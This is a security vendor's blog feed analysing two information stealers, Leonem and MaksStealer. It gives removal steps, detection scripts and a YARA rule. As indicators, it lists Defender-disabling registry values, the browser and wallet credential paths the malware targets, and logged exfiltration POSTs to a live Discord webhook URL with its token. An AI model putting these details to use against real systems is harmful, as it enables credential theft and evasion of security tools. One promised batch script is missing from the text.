Spyware – Gridinsoft Blog
https://gridinsoft.com/blogs
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Last updated Fri, 30 May 2025 20:50:53 +0000.

Trojan:Win32/Leonem – Information Stealer Analysis & Removal Guide
https://gridinsoft.com/blogs/trojan-win32-leonem/
Fri, 30 May 2025 13:37:54 +0000

Trojan:Win32/Leonem is an information-stealing threat that targets user credentials and system security. This malware harvests passwords while disabling security protections. It functions as both a data stealer and malware dropper, creating multiple attack vectors.

Information-stealing trojan that harvests credentials from browsers and email clients while potentially dropping additional malware payloads
Trojan:Win32/Leonem detection popup screenshot

Understanding Trojan:Win32/Leonem

Trojan:Win32/Leonem is Microsoft Defender’s detection name for a spyware variant. This malware extracts authentication data from compromised systems. It targets credentials, session tokens, and login data from browsers and email clients.

Leonem differs from standard information stealers through its dual functionality. It steals credentials and downloads additional malware payloads. This capability escalates infections to more severe threats like ransomware or backdoors.

The malware spreads through phishing campaigns with malicious email attachments. These attachments appear as business documents, invoices, or shipping notifications. It is also bundled with pirated software and fake updates served from compromised websites.

Leonem Distribution Vectors (2024-2025) (chart): Phishing Emails 55%, Malicious Downloads 30%, Software Vulnerabilities 10%, Other Malware 5%

Source: Data compiled from GridinSoft threat intelligence and cybersecurity reports, 2024-2025

Technical Analysis and Behavior

Leonem uses multiple evasion techniques to avoid detection. The malware checks for sandbox environments, debugging tools, and virtual machines. This helps it identify analysis systems used by security researchers.

Anti-Analysis Techniques

The malware leverages legitimate Windows processes to maintain stealth. It uses these processes to perform environment checks without triggering alarms. This approach helps it blend in with normal system activity.

%windir%\System32\svchost.exe -k WerSvcGroup
wmiadap.exe /F /T /R
%windir%\system32\wbem\wmiprvse.exe
"%windir%\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Leonem conducts system reconnaissance using Windows Management Instrumentation (WMI) queries. It targets Win32_Bios and Win32_NetworkAdapter classes to gather hardware details. This information helps distinguish between real user environments and controlled analysis systems.

The malware examines registry locations and configuration files to identify security tools. It looks for analysis frameworks and security software installations. This reconnaissance helps it adapt its behavior accordingly.

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\Levels
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config

Leonem generates a unique system fingerprint for each infected machine. This fingerprint allows threat actors to track infections and avoid redundant attacks. It also enables customized payloads based on system characteristics.

Security Software Neutralization

Leonem targets Microsoft Defender to disable real-time protection features. It accomplishes this through registry manipulation and service interference. The malware abuses legitimate system processes to execute these security bypasses.

The malware targets these system processes to execute security bypass operations:

C:\Windows\system32\services.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\SecurityHealthService.exe

Leonem modifies registry keys that control Microsoft Defender’s protection mechanisms. These modifications disable real-time protection, script scanning, and behavioral monitoring. The changes create an environment where malware can operate without interference.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiVirus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\MpEngine_DisableScriptScanning

Credential Harvesting Operations

After bypassing security, Leonem begins credential harvesting. The malware targets stored authentication data across multiple browsers and email clients. It focuses on databases and files where login credentials are stored.

Target Application / File Locations

Google Chrome
  C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Login Data
Microsoft Edge
  C:\Users\<USER>\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
  C:\Users\<USER>\AppData\Local\Microsoft\Edge\User Data\Login Data
Mozilla Firefox
  C:\Users\<USER>\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\logins.json
  C:\Users\<USER>\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\signons.sqlite
  C:\Users\<USER>\AppData\Roaming\Mozilla\Firefox\profiles.ini
Alternative Browsers
  C:\Users\<USER>\AppData\Local\360Chrome\Chrome\User Data
  C:\Users\<USER>\AppData\Local\Chromium\User Data
  C:\Users\<USER>\AppData\Local\Torch\User Data
  C:\Users\<USER>\AppData\Local\UCBrowser\
  C:\Users\<USER>\AppData\Local\Tencent\QQBrowser\User Data\Default\EncryptedStorage
Email Clients
  C:\Users\<USER>\AppData\Local\Mailbird\Store\Store.db
  C:\Users\<USER>\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini
  C:\Users\<USER>\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
  C:\Users\<USER>\AppData\Roaming\Thunderbird\profiles.ini

Leonem implements real-time keystroke capture through DirectInput object creation. This keylogging functionality captures credentials as users enter them. It works on secure websites and applications that don’t store authentication details locally.

Data Exfiltration Methods

Leonem transmits harvested data to its command and control infrastructure. The malware uses Discord webhooks as its primary exfiltration channel. This technique allows malicious traffic to blend with legitimate communications.

The malware establishes TCP connections on ports 443 and 80. It then executes HTTP requests to the command and control infrastructure:

POST https://discord.com:443/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 200
POST https://discord.com/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 404

The HTTP status codes show whether exfiltration succeeded (200) or the webhook endpoint no longer exists (404), for example because the webhook was deleted. Leonem also queries external IP information services like ip-api.com. This helps threat actors assess whether the compromised system represents a high-value target.
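The traffic pattern above is easy to hunt for in proxy or HTTP logs. The following PowerShell is an added example (not from the original post) that flags POSTs to Discord webhook URLs and rates them higher when the same client also queried ip-api.com shortly before or after; the log line format, the function name and the sample lines are constructed for this example.

```powershell
# Added example, not from the original post: scan proxy/HTTP log lines for
# POSTs to Discord webhook URLs and a public-IP lookup against ip-api.com
# from the same host. The log line format and the sample lines are
# constructed for this example.
function Find-WebhookExfiltration {
    param(
        [Parameter(Mandatory)] [string[]]$LogLines,
        # An ip-api.com lookup within this many minutes of a webhook POST
        # from the same client is treated as part of the same activity.
        [int]$WindowMinutes = 10
    )

    # Constructed format: "<ISO timestamp> <client-ip> <method> <url> <status>"
    $lineRegex     = '^(?<ts>\S+)\s+(?<client>\S+)\s+(?<method>[A-Z]+)\s+(?<url>\S+)\s+(?<status>\d{3})$'
    $webhookRegex  = 'https?://discord(?:app)?\.com(?::443)?/api/webhooks/(?<id>\d+)/'
    $ipLookupRegex = 'https?://ip-api\.com/'

    $events = foreach ($line in $LogLines) {
        if ($line -match $lineRegex) {
            [pscustomobject]@{
                Time   = [datetime]::Parse($Matches.ts, [cultureinfo]::InvariantCulture)
                Client = $Matches.client
                Method = $Matches.method
                Url    = $Matches.url
                Status = [int]$Matches.status
            }
        }
    }

    $lookups  = @($events | Where-Object { $_.Url -match $ipLookupRegex })
    $webhooks = @($events | Where-Object { $_.Method -eq 'POST' -and $_.Url -match $webhookRegex })

    foreach ($post in $webhooks) {
        $null = $post.Url -match $webhookRegex
        $webhookId = $Matches.id

        $pairedLookup = $lookups | Where-Object {
            $_.Client -eq $post.Client -and
            [math]::Abs(($post.Time - $_.Time).TotalMinutes) -le $WindowMinutes
        } | Select-Object -First 1

        # 200 means the data was accepted; 404 means the webhook no longer
        # exists. The host is still trying to exfiltrate in both cases.
        $outcome = switch ($post.Status) {
            200     { 'delivered' }
            404     { 'webhook gone' }
            default { "http $($post.Status)" }
        }

        # A webhook POST on its own may be a legitimate bot or CI job; the
        # same client also asking ip-api.com for its public IP is the
        # stealer pattern the post describes.
        $severity = if ($pairedLookup) { 'high' } else { 'medium' }

        [pscustomobject]@{
            Time      = $post.Time
            Client    = $post.Client
            WebhookId = $webhookId
            Status    = $post.Status
            Outcome   = $outcome
            IpLookup  = [bool]$pairedLookup
            Severity  = $severity
        }
    }
}

# Constructed sample log (not real traffic): webhook ids and tokens are placeholders.
$sampleLog = @'
2025-05-30T13:35:02Z 10.0.0.12 GET http://ip-api.com/json/ 200
2025-05-30T13:35:09Z 10.0.0.12 POST https://discord.com:443/api/webhooks/123456789012345678/PLACEHOLDER_TOKEN 200
2025-05-30T13:36:40Z 10.0.0.12 POST https://discord.com/api/webhooks/123456789012345678/PLACEHOLDER_TOKEN 404
2025-05-30T13:40:00Z 10.0.0.25 POST https://discord.com/api/webhooks/987654321098765432/PLACEHOLDER_TOKEN 200
2025-05-30T13:41:13Z 10.0.0.25 GET https://example.com/ 200
'@ -split "`r?`n"

Find-WebhookExfiltration -LogLines $sampleLog | Format-Table -AutoSize
```

On the sample, the two POSTs from 10.0.0.12 come out as high severity (paired with the ip-api.com lookup) and the one from 10.0.0.25 as medium; which process on the host made the request still has to come from endpoint telemetry.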

Impact Assessment and Risk Analysis

Leonem infections extend beyond immediate credential theft. Organizations and individuals face broader implications from this threat. The cascading effects can be severe and long-lasting.

Financial and Identity Theft Risks

Leonem enables unauthorized access to financial and personal accounts. Threat actors can execute various malicious activities once they obtain credentials. These activities often result in significant financial losses.

  • Unauthorized access to online banking and financial services
  • Fraudulent transactions and unauthorized purchases
  • Unauthorized fund transfers from compromised accounts
  • Identity theft and establishment of new credit accounts
  • Compromise of cryptocurrency wallets and trading platforms

Financial losses from these activities can be difficult to recover. Fraud protection services may not cover all damages. Organizations face additional risks from employee credential compromise leading to broader network access.

Enterprise Security Implications

In enterprise environments, Leonem serves as an initial vector for extensive security breaches. Valid employee credentials enable threat actors to move laterally across networks. They can bypass multi-factor authentication through session token capture.

  • Execute lateral movement across network infrastructure
  • Bypass multi-factor authentication through session token capture
  • Access sensitive corporate data, intellectual property, and customer information
  • Deploy additional malware throughout the organization

Organizations can face comprehensive data breaches from single compromised endpoints. These breaches carry regulatory compliance implications and potential legal consequences. The reputational damage can be long-lasting and costly.

Secondary Payload Deployment

Leonem’s malware dropper functionality introduces additional risk factors. Initial infections can lead to deployment of more severe threats. These secondary infections often cause substantial damage beyond credential theft.

  • Ransomware: File encryption attacks demanding payment for data recovery
  • Banking Trojans: Malware targeting financial transactions and information
  • Backdoors: Persistent access mechanisms for long-term system compromise
  • Cryptominers: Resource hijacking for unauthorized cryptocurrency mining

Secondary infections can render systems inoperable or establish long-term surveillance capabilities. Threat actors gain persistent access to compromised environments. Recovery from these infections often requires complete system rebuilds.

Removal Procedures

Leonem’s security bypass capabilities require specialized removal approaches. Standard removal methods may be insufficient due to disabled security protections. Effective removal requires systematic procedures using specialized security tools.

Professional Removal Solution

GridinSoft Anti-Malware provides effective detection and elimination of Leonem and associated threats. This security software identifies and removes trojans and their components. It works even when system protections have been compromised.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Manual Removal Procedures

Professional removal tools are strongly recommended due to Leonem’s complexity. Experienced users may attempt manual removal following these procedures. Manual removal carries inherent risks and may not address all infection components.

  1. Boot into Safe Mode: Restart the system and access Advanced Boot Options by pressing F8 during startup. Select “Safe Mode with Networking” to limit malware functionality during removal procedures.
  2. Process Analysis: Open Task Manager (Ctrl+Shift+Esc) and examine running processes for suspicious activity. Look for unfamiliar processes consuming system resources or exhibiting unusual network activity.
  3. Security Service Restoration: Restore Windows Defender functionality by repairing modified registry entries:
    • Launch Registry Editor (regedit)
    • Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
    • Locate and delete the DisableAntiVirus value or set it to 0
    • Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
    • Reset DisableRealtimeMonitoring, DisableIOAVProtection, and DisableScriptScanning values to 0
  4. System Scan: After restoring Windows Defender, perform a system scan to identify and remove malicious components.
  5. Browser Security: Remove suspicious browser extensions and reset browsers to default configurations:
    • Chrome: Settings > Advanced > Reset and clean up > Restore settings to original defaults
    • Edge: Settings > Reset settings > Restore settings to default values
    • Firefox: Help > Troubleshooting Information > Refresh Firefox
  6. Credential Security: Change all account passwords using a clean, uninfected device. Prioritize financial services, email, and other sensitive platforms.
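Step 3 above can be scripted so that nothing is missed and the result is auditable. The following PowerShell is an added example (not from the original post) that reads the Defender registry values the post lists, reports any that are set to a non-zero value, and resets them when asked; the function name is ours, and DisableAntiSpyware under the Policies key is included as a well-known related value that the post does not mention.

```powershell
# Added example, not from the original post: audit the Microsoft Defender
# registry values the post lists (step 3 above) and optionally reset them.
# Run from an elevated PowerShell prompt; the function name is ours.
function Test-DefenderTampering {
    [CmdletBinding()]
    param(
        # Reset every non-zero value to 0 (protection enabled) instead of only reporting it.
        [switch]$Repair
    )

    $checks = @(
        @{ Key   = 'HKLM:\SOFTWARE\Microsoft\Windows Defender'
           Names = @('DisableAntiVirus') }
        @{ Key   = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection'
           Names = @('DisableIOAVProtection', 'DisableRealtimeMonitoring',
                     'DisableScriptScanning', 'MpEngine_DisableScriptScanning') }
        # Leonem also touches the Policies key, where a value of 1 overrides
        # whatever the Defender UI shows. DisableAntiSpyware is not in the
        # post; it is the long-standing policy value that switches Defender off.
        @{ Key   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
           Names = @('DisableAntiVirus', 'DisableAntiSpyware') }
        @{ Key   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'
           Names = @('DisableIOAVProtection', 'DisableRealtimeMonitoring', 'DisableScriptScanning') }
    )

    foreach ($check in $checks) {
        if (-not (Test-Path -Path $check.Key)) { continue }
        $props = Get-ItemProperty -Path $check.Key
        foreach ($name in $check.Names) {
            $value = $props.$name
            if ($null -eq $value) { continue }      # value not present: nothing was set
            $tampered = [int]$value -ne 0
            $action = if (-not $tampered) { 'ok' } else { 'needs repair' }
            if ($tampered -and $Repair) {
                # With Tamper Protection on, Defender ignores or reverts this
                # write. That is expected: the built-in guard is still intact
                # and the setting should be cleared through the Security app.
                try {
                    Set-ItemProperty -Path $check.Key -Name $name -Value 0 -Type DWord -ErrorAction Stop
                    $action = 'reset to 0'
                } catch {
                    $action = "write blocked: $($_.Exception.Message)"
                }
            }
            [pscustomobject]@{
                Key      = $check.Key
                Name     = $name
                Value    = $value
                Tampered = $tampered
                Action   = $action
            }
        }
    }
}

# Report first; repair only after reviewing the report, then confirm that
# real-time protection is back on.
Test-DefenderTampering | Format-Table -AutoSize
# Test-DefenderTampering -Repair | Format-Table -AutoSize
# Get-MpComputerStatus | Select-Object AntivirusEnabled, RealTimeProtectionEnabled, IsTamperProtected
```

Values set through Group Policy reappear at the next policy refresh, so a finding under the Policies key on a domain-joined machine should be checked against the actual GPO before it is treated as malware tampering.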

Manual removal may not address all infection components. Leonem’s complexity and potential for deploying additional threats make professional removal tools more reliable. Complete system scans are essential after any removal attempt.

Prevention and Security Hardening

Preventing Leonem infections requires multiple security measures. These measures address both technical vulnerabilities and human factors. A multi-layered defense strategy provides the most effective protection.

Email Security Implementation

Leonem primarily distributes through phishing campaigns. Email security measures are essential for prevention. Organizations should implement strict policies regarding email attachments and sender verification.

  • Attachment Verification: Implement strict policies regarding email attachments from unknown sources and verify unexpected attachments from known contacts
  • Sender Authentication: Carefully examine sender email addresses for domain spoofing and subtle misspellings
  • Urgency Assessment: Exercise caution with emails creating artificial urgency, particularly those requesting credential verification or financial transactions
  • Email Filtering: Deploy email security solutions capable of detecting and quarantining phishing attempts

System Security Configuration

System security requires regular maintenance and proper configuration. Organizations should maintain current software updates and deploy endpoint protection. Application control and network security provide additional protection layers.

  • Update Management: Maintain current operating system and software updates to address security vulnerabilities
  • Endpoint Protection: Deploy anti-malware solutions like GridinSoft Anti-Malware capable of detecting threats
  • Application Control: Implement application whitelisting to prevent unauthorized program execution
  • Network Security: Configure firewalls to monitor and control both inbound and outbound network traffic
  • Macro Security: Configure Microsoft Office to disable macros by default or restrict execution to digitally signed macros

Authentication Security

Authentication security provides critical protection against credential theft. Multi-factor authentication adds security layers beyond passwords. Password managers help generate and store strong, unique passwords.

  • Multi-Factor Authentication: Implement MFA across all systems and services to provide additional security layers
  • Password Management: Utilize password managers to generate and store strong, unique passwords
  • Credential Storage: Avoid storing credentials in browsers or implement password managers with enhanced encryption
  • Access Auditing: Regularly review account access permissions and authorized applications

Security Awareness and Training

User education provides essential protection against social engineering attacks. Regular security awareness training helps users recognize phishing attempts. Clear security policies establish guidelines for software installation and incident reporting.

  • User Education: Provide regular security awareness training focusing on phishing recognition and social engineering tactics
  • Policy Development: Establish clear security policies for software installation, email handling, and incident reporting
  • Incident Response: Implement procedures for rapid reporting and response to suspicious activities
  • Security Culture: Foster an organizational culture where security verification is standard practice

These preventive measures reduce the risk of Leonem and similar threats. Effective security requires coordination between technological solutions and educated users. Regular review and updates of security measures ensure continued protection.

Frequently Asked Questions

What is the threat level of Trojan:Win32/Leonem?

Trojan:Win32/Leonem is classified as a high-severity threat due to its credential harvesting capabilities and ability to deploy additional malware. The malware extracts passwords from multiple browsers and email clients while disabling security software. This combination leads to identity theft, financial loss, and deployment of secondary threats such as ransomware.

How can I identify a Leonem infection?

Leonem infections show several indicators including system performance degradation and unauthorized disabling of Microsoft Defender. Users may observe browser setting modifications, installation of unknown browser extensions, or unusual pop-ups and redirects. In some cases, unauthorized financial transactions or evidence of account access from unknown locations may be discovered.

Can Windows Defender effectively remove Leonem?

Windows Defender can detect Leonem during initial infection stages, but the malware targets and disables Windows Defender as part of its attack sequence. Leonem modifies registry settings to disable real-time protection, script scanning, and other security features. Once Windows Defender has been compromised, it cannot effectively detect or remove the threat.

What post-removal procedures should be followed?

Following Leonem removal, immediate password changes for all accounts are essential, prioritizing financial services, email, and other platforms. Use a clean, uninfected device for credential updates when possible. Enable multi-factor authentication across all available services to provide additional security layers.

What are the primary distribution methods for Leonem?

Leonem primarily distributes through phishing campaigns featuring malicious email attachments disguised as business documents, invoices, or shipping notifications. Secondary distribution vectors include compromised or fraudulent software downloads, particularly pirated software or deceptive versions of applications. Malicious advertising campaigns may redirect users to websites hosting the malware through browser exploits or social engineering techniques.

MaksStealer (MaxCoffe): The Minecraft Mod That’s Actually Stealing Your Passwords
https://gridinsoft.com/blogs/maksstealer-malware-analysis-removal/
Tue, 20 May 2025 16:58:18 +0000

For Minecraft Gamers: MaxCoffe masquerading as a Minecraft performance enhancer! MaksStealer is an information-stealing trojan targeting Minecraft players, especially those on the popular Hypixel SkyBlock server. It promises to boost your gameplay or provide cheats but actually runs off with your passwords, crypto, and Discord account.

I’ve analyzed dozens of these gaming-related malware strains, and this one is particularly sneaky. Let’s break down what MaksStealer is, how it works, and most importantly – how to kick it off your system before it empties your crypto wallets.

MaksStealer Malware

Threat Type: Information Stealer, Trojan
Disguise: Minecraft Hypixel SkyBlock performance mod/cheat
What It Steals: Browser credentials, Discord tokens, cryptocurrency wallets
Distribution: Gaming forums, YouTube comments, Discord servers, pirated software
Detection Names: Trojan.MaxCoffe, Trojan.GenericKD.76438532, Java/MaksRat.B, HEUR:Trojan-PSW.Java.Stealer.gen
Risk Level: High (financial loss, account theft, privacy breach)

MaksStealer infection chain (diagram): gaming forums (“Free Minecraft Mods”) → download .JAR file (“CasinoEssentials.jar”) → user runs the mod (“Java -jar filename.jar”) → stealer activates (runs in background) → data collection (browsers, Discord, crypto) → data exfiltration (sends to attacker servers)

Source: Analysis of MaksStealer behavior from Triage and VirusTotal findings, May 2025

What Is MaksStealer and How Bad Is It?

MaksStealer is a Java-based information stealer that’s specifically targeting gamers. It masquerades as a performance enhancement mod or cheat for Minecraft’s Hypixel SkyBlock but is actually harvesting every piece of valuable data it can find. This malware is especially dangerous because it targets multiple data types at once – your passwords, gaming accounts, and cryptocurrency wallets.

Unlike some malware that announces itself with annoying popups or system slowdowns, MaksStealer works silently in the background. You won’t even know it’s there until your accounts start getting hijacked or your crypto mysteriously disappears. That stealth factor makes it particularly dangerous for everyday users who aren’t constantly monitoring their system processes.

How This Digital Pickpocket Works

Once executed, MaksStealer immediately starts scanning your system for valuable data. It focuses on three main categories:

1. Web Browser Theft

MaksStealer doesn’t play favorites – it hits all major browsers. Chrome, Firefox, Edge, Opera, Brave, Vivaldi, and Yandex are all on its hit list. The malware expertly extracts saved passwords, cookies, autofill data, and browsing history from these browsers.

Think about all those sites where you’ve clicked “remember password” for convenience. Banking sites, email, social media, online shopping – MaksStealer can now access all of them. It’s like handing over your entire digital identity on a silver platter.

2. Discord Account Targeting

For gamers, Discord is often the communication hub for everything. MaksStealer specifically looks for Discord authentication tokens stored on your computer. These tokens are basically digital keys to your Discord account.

With your token, attackers can log into your Discord account without needing your password and without having to get past two-factor authentication. They can then impersonate you, message your friends with malware links, join private servers, or access private conversations. This aspect is particularly effective for spreading the malware further through gaming communities.

3. Cryptocurrency Wallet Raiding

Perhaps most financially damaging is MaksStealer’s ability to target cryptocurrency wallets. It searches for popular wallet software like Armory, Bytecoin, Coinomi, Exodus, Ethereum, Electrum, Atomic Wallet, and many others. The malware extracts wallet files, private keys, and seed phrases.

Once attackers have this data, your cryptocurrency can be transferred away in minutes. And due to the decentralized, anonymous nature of crypto transactions, these funds are virtually impossible to recover. One moment your digital wallet is full, the next it’s emptied with no recourse.

MaksStealer target browsers shown
MaksStealer code showing targeted browsers for credential theft (Source: Triage analysis)

How MaksStealer Spreads: The Bait and Switch

Malware distributors are getting creative with their delivery methods. MaksStealer typically spreads through channels that gamers frequently use and trust:

  • Gaming Forums: Posts claiming to offer performance enhancements or “legal” cheats for Minecraft
  • YouTube Comments: Links in comment sections of Minecraft tutorials or gameplay videos
  • Discord Servers: Malicious users sharing “exclusive” mods in gaming servers
  • Unofficial Mod Sites: Fake or compromised websites hosting malicious JAR files
  • Pirated Game Portals: Bundled with cracked game versions or key generators

The common element is social engineering. The attackers know gamers are often looking for ways to enhance their gameplay or get an edge. They’re exploiting that desire by packaging their malware as something beneficial. It’s like offering someone a performance-enhancing drink that’s actually poison.

What makes this distribution method particularly effective is that gamers are already accustomed to downloading and running third-party software. Minecraft’s massive modding community has created an environment where running JAR files is normalized. MaksStealer exploits this trust.

What MaksStealer Targets (chart): browser credentials, Discord tokens, cryptocurrency wallets, system information

Source: Data types targeted by MaksStealer based on behavioral analysis

Warning Signs Your System Might Be Infected

MaksStealer is designed to operate stealthily, but there are some subtle signs that might indicate infection:

  • Unexplained Account Activity: Logins to your accounts from unknown locations or devices
  • Missing Cryptocurrency: Unexplained transactions or emptied wallets
  • Strange Discord Messages: Messages sent from your account that you didn’t write
  • Performance Issues: While running in the background, MaksStealer may cause slight system slowdowns
  • Unusual Network Traffic: Increased data usage when you’re not actively downloading
  • Java Process Running: Unexpected Java processes in your task manager after running a Minecraft mod

If you notice any of these signs after downloading and running a new Minecraft mod or tool, you should act immediately. Information stealers work quickly, so every minute counts in preventing further data theft.

You can check for suspicious Java processes using this PowerShell command:

# Check for suspicious Java processes
Get-Process | Where-Object {$_.ProcessName -like "*java*"} |
Select-Object ProcessName, Id, StartTime, Path |
Format-Table -AutoSize

# Look specifically for processes with MaxCoffe in the command line (if advanced).
# Get-CimInstance replaces the older Get-WmiObject, which is not available in PowerShell 7.
Get-CimInstance Win32_Process | Where-Object {$_.CommandLine -like "*MaxCoffe*" -or $_.CommandLine -like "*Coffe*"} |
Select-Object ProcessId, Name, CommandLine

Suspicious indicators include Java processes running from temporary directories, recently started Java processes that you don’t recognize, or processes with “MaxCoffe” in their command line.

For Linux or Mac users, you can use this Bash command:

# List all Java processes with details ("[j]ava" keeps grep from matching its own command line)
ps aux | grep -i "[j]ava"

# Check for suspicious Java processes with MaxCoffe or Coffe in their arguments
ps aux | grep -i "[j]ava" | grep -E "MaxCoffe|Coffe"

# Check for recently modified Java-related files (last 7 days)
find ~/ -name "*.jar" -mtime -7 -ls 2>/dev/null

Security researchers can also use this YARA rule to detect potential MaksStealer samples:

rule MaksStealer_Java_InfoStealer {
    meta:
        description = "Detects MaksStealer Java information stealer"
        author = "GridinSoft Security Researcher"
        date = "2025-05"
        severity = "high"
        hash = "9a17f87dcd2208f8f62ed76a15a6c52817008e77179c8b1f7f39c079d419f398"

    strings:
        $mod_header = "@Mod" ascii
        $mod_id = "modid = \"MaxCoffe\"" ascii
        
        $browser1 = "\\Google\\Chrome\\User Data" ascii
        $browser2 = "\\Mozilla\\Firefox\\Profiles" ascii
        $browser3 = "\\BraveSoftware\\Brave-Browser" ascii
        
        $discord1 = "\\discord\\Local Storage\\leveldb" ascii
        $discord2 = "\\discordcanary\\Local Storage\\leveldb" ascii
        
        $crypto1 = "\\Bitcoin\\wallet.dat" ascii
        $crypto2 = "\\Ethereum\\keystore" ascii
        $crypto3 = "\\Electrum\\wallets" ascii
        
        $obf_pattern1 = "lIIl(" ascii
        $obf_pattern2 = "lII[lll[" ascii

    condition:
        $mod_header and $mod_id and
        (2 of ($browser*)) and
        (1 of ($discord*)) and
        (1 of ($crypto*)) and
        (1 of ($obf_pattern*))
}
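A JAR is a zip archive, so a string rule run against the file itself only sees compressed bytes; to check a downloaded mod before running it, each entry has to be decompressed and scanned. The following PowerShell is an added example (not from the original post) that does this with the indicator strings from the rule above; the function name, the obfuscated-class-name regex and the verdict logic are ours.

```powershell
# Added example, not from the original post: inspect a mod JAR before
# running it. Each zip entry is decompressed and searched for the indicator
# strings the YARA rule above uses. The function name, the class-name regex
# and the verdict logic are ours.
Add-Type -AssemblyName System.IO.Compression.FileSystem

function Get-JarIndicators {
    param([Parameter(Mandatory)] [string]$JarPath)

    # Plain ASCII strings from the rule above (Java string constants keep
    # single backslashes in the compiled class file).
    $indicators = @{
        ModId   = @('MaxCoffe')
        Browser = @('\Google\Chrome\User Data', '\Mozilla\Firefox\Profiles', '\BraveSoftware\Brave-Browser')
        Discord = @('\discord\Local Storage\leveldb', '\discordcanary\Local Storage\leveldb')
        Crypto  = @('\Bitcoin\wallet.dat', '\Ethereum\keystore', '\Electrum\wallets')
    }
    # Class names built only from l and I (e.g. lIIl.class) match the
    # obfuscation style seen in the decompiled sample.
    $obfuscatedName = '(^|/)[lI]{2,}\.class$'
    $latin1 = [System.Text.Encoding]::GetEncoding('ISO-8859-1')

    $hits = @{}
    $obfuscatedClasses = 0
    $zip = [System.IO.Compression.ZipFile]::OpenRead((Resolve-Path -Path $JarPath).Path)
    try {
        foreach ($entry in $zip.Entries) {
            if ($entry.FullName -match $obfuscatedName) { $obfuscatedClasses++ }
            if ($entry.Length -eq 0) { continue }       # directory entries and empty files
            $stream = $entry.Open()
            try {
                $buffer = New-Object System.IO.MemoryStream
                $stream.CopyTo($buffer)
                # Latin-1 maps every byte to one char, so ASCII indicators can
                # be searched inside binary .class files without decode errors.
                $text = $latin1.GetString($buffer.ToArray())
            } finally { $stream.Dispose() }
            foreach ($group in $indicators.Keys) {
                foreach ($needle in $indicators[$group]) {
                    if ($text.Contains($needle)) {
                        if (-not $hits.ContainsKey($group)) { $hits[$group] = @() }
                        $hits[$group] += "$($entry.FullName): $needle"
                    }
                }
            }
        }
    } finally { $zip.Dispose() }

    # Stealers often keep their strings encrypted at rest (the decompiled
    # listing in the post appears to show decryption calls), so a clean string
    # scan is not proof of safety; obfuscated class names still warrant a look.
    $verdict = if ($hits.ContainsKey('ModId') -or
                   ($hits.ContainsKey('Browser') -and ($hits.ContainsKey('Discord') -or $hits.ContainsKey('Crypto')))) {
        'do not run: stealer indicators present'
    } elseif ($obfuscatedClasses -gt 0) {
        'review manually: obfuscated class names, no plaintext indicators'
    } else {
        'no stealer indicators found'
    }

    [pscustomobject]@{
        Jar               = $JarPath
        ObfuscatedClasses = $obfuscatedClasses
        Matches           = $hits
        Verdict           = $verdict
    }
}

# Usage: Get-JarIndicators -JarPath '.\CasinoEssentials.jar' | Format-List
```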

How to Remove MaksStealer From Your System

If you suspect you’ve been infected with MaksStealer, follow these steps to remove it:

Step 1: Disconnect from the Internet

Immediately disconnect your computer from the internet. This prevents the malware from sending more of your data to the attackers’ servers or receiving additional commands. You can reconnect once the malware is removed.

Step 2: Scan with Antimalware Software

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

After scanning with anti-malware software, you might want to perform additional manual cleanup. Here’s a batch script that can help remove common MaksStealer artifacts:

Step 3: Reset Your Passwords and Secure Accounts

After removing the malware, immediately change passwords for all your important accounts. Start with email accounts, banking websites, and cryptocurrency platforms. Use a different device for these password changes if possible, as keyloggers might still be active.

